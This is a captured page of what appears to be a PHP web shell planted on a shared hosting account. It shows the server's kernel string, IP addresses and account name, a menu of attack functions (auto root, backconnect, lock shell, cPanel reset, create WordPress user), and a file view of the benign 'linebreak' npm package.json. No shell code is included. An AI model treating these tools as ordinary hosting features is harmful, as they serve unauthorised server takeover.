Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
node_modules /
linebreak /
[ HOME SHELL ]
Name
Size
Permission
Action
node_modules
[ DIR ]
dr-xr-xr-x
src
[ DIR ]
dr-xr-xr-x
test
[ DIR ]
dr-xr-xr-x
package.json
794
B
-rw-r--r--
readme.md
2.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "linebreak", "version": "1.0.2", "description": "An implementation of the Unicode Line Breaking Algorithm (UAX #14)", "repository": { "type": "git", "url": "https://github.com/devongovett/linebreaker.git" }, "keywords": [ "unicode", "text", "wrapping" ], "author": "Devon Govett <devongovett@gmail.com>", "license": "MIT", "bugs": { "url": "https://github.com/devongovett/linebreaker/issues" }, "homepage": "https://github.com/devongovett/linebreaker", "dependencies": { "base64-js": "0.0.8", "brfs": "^2.0.2", "unicode-trie": "^1.0.0" }, "devDependencies": { "mocha": "^6.0.2" }, "scripts": { "test": "mocha" }, "main": "src/linebreaker", "browserify": { "transform": [ "brfs" ] } }
Close